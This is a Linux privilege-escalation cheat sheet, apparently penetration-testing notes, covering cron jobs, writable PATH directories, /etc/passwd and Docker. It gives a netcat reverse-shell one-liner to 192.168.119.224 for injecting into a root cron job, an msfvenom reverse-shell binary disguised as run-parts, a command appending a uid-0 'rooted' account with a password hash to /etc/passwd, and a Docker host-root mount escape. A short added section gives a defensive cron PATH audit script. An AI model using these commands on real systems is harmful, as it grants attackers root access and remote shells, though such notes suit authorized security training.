# Linux Escalate

### Crontab

Check crontab:

`crontab -l`

`cat /etc/crontab`

Check cron logs:

`cat /var/log/cron.log`

Check permissions of file:

`ls -al FILE`

**Example vulnerable crontab with a writable path of /usr/local/bin:**

```
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
*/5 *   * * *   root    cd / && run-parts --report /etc/cron.hourly
```

#### Add injectable into cron job:

`echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.224 8008 >/tmp/f" >> CRON JOB`

`OR`

#### Create shell and copy to good location:

`msfvenom -p linux/x64/shell_reverse_tcp lhost=IP lport=PORT -f elf-so -o run-parts`

### Writable paths

Check for writable paths that systemd units use, any path that a crontab uses, any writable services, etc.:

`/usr/local/bin`

`/usr/bin`
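
To audit a host for the condition shown in the crontab example above, the following added example (not part of the original page) lists every directory on a crontab's `PATH=` line that is group- or world-writable or not owned by a trusted owner. The function name `audit_cron_path` and the default trusted owner `root` are assumptions.

```sh
#!/bin/sh
# Added example (not from the original page): flag unsafe PATH directories
# in a system crontab such as /etc/crontab.

# audit_cron_path CRON_FILE [TRUSTED_OWNER]
# Prints each directory from the crontab's PATH= line that is group- or
# world-writable, or not owned by TRUSTED_OWNER (assumption: defaults to root).
audit_cron_path() {
    cron_file=$1
    trusted_owner=${2:-root}

    # Use the first PATH= assignment found in the file.
    path_value=$(sed -n 's/^[[:space:]]*PATH=//p' "$cron_file" | head -n 1)
    [ -n "$path_value" ] || return 0

    printf '%s\n' "$path_value" | tr ':' '\n' | while IFS= read -r dir; do
        # -H resolves a symlinked directory (e.g. /bin -> usr/bin) so the
        # target's mode is checked; -prune stops find from descending.
        if [ -d "$dir" ] && [ -n "$(find -H "$dir" -prune \
                \( -perm -002 -o -perm -020 -o ! -user "$trusted_owner" \) \
                -print 2>/dev/null)" ]; then
            printf '%s\n' "$dir"
        fi
    done
}

# Usage: audit_cron_path /etc/crontab
```

Any directory it prints should be owned by root with mode 755, or removed from the crontab's `PATH`; referencing commands by absolute path in cron jobs avoids the lookup entirely.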

### /etc/passwd

Check whether /etc/passwd is readable and writable using `ls -al /etc/passwd`. If vulnerable, create a password hash:

`openssl passwd P@ssw0rd`

Add to /etc/passwd:

`echo "rooted:O2dKjKQQCeuQE:0:0:root:/root:/bin/bash" >> /etc/passwd`

### Docker

```
docker images
docker run -v /:/mnt --rm -it IMAGE chroot /mnt sh
```
